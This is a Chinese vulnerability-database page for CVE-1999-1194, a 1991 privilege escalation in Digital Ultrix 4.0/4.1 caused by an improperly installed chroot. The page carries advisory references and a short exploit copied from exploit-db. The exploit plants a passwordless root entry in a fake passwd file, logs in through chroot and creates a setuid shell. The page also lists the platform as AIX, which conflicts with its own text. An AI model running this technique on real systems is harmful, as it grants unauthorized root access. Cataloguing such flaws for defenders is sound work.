Digital Ultrix chroot提升特权漏洞-安全小百科

Digital Ultrix chroot提升特权漏洞

漏洞ID	1105236	漏洞类型	未知
发布时间	1991-05-01	更新时间	2005-05-02
CVE编号	CVE-1999-1194	CNNVD-ID	CNNVD-199105-001
漏洞平台	AIX	CVSS评分	7.2

|漏洞来源

https://www.exploit-db.com/exploits/19041
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199105-001

|漏洞详情

DigitalUltrix4.1和4.0版本中的chroot被不安全安装，本地用户可以提升特权。

|漏洞EXP

source: http://www.securityfocus.com/bid/17/info

By default, /usr/bin/chroot is improperly installed in Ultrix versions 4.0 and 4.1. Anyone can execute /usr/bin/chroot this can lead to system users to gain unauthorized privileges.

$ mkdir /tmp/etc
$ echo root::0:0::/:/bin/sh > /tmp/etc/passwd
$ mkdir /tmp/bin
$ cp /bin/sh /tmp/bin/sh
$ cp /bin/chmod /tmp/bin/chmod
$ chroot /tmp /bin/login

Then login as root with no password. chmod /tmp/bin/sh
to 4700, exit and run the suid /tmp/bin/sh.

|参考资料

来源:CERT/CCAdvisory:CA-1991-05
名称:CA-1991-05
链接:http://www.cert.org/advisories/CA-1991-05.html
来源:XF
名称:dec-chroot(577)
链接:http://xforce.iss.net/static/577.php
来源:BID
名称:17
链接:http://www.securityfocus.com/bid/17

相关推荐: ATFTP 0.7 – Timeout Command Line Argument Local Buffer Overflow

ATFTP 0.7 – Timeout Command Line Argument Local Buffer Overflow 漏洞ID 1053938 漏洞类型发布时间 2003-06-06 更新时间 2003-06-06 CVE编号 N/A CNNVD-…

文章版权归作者所有，未经允许请勿转载。

THE END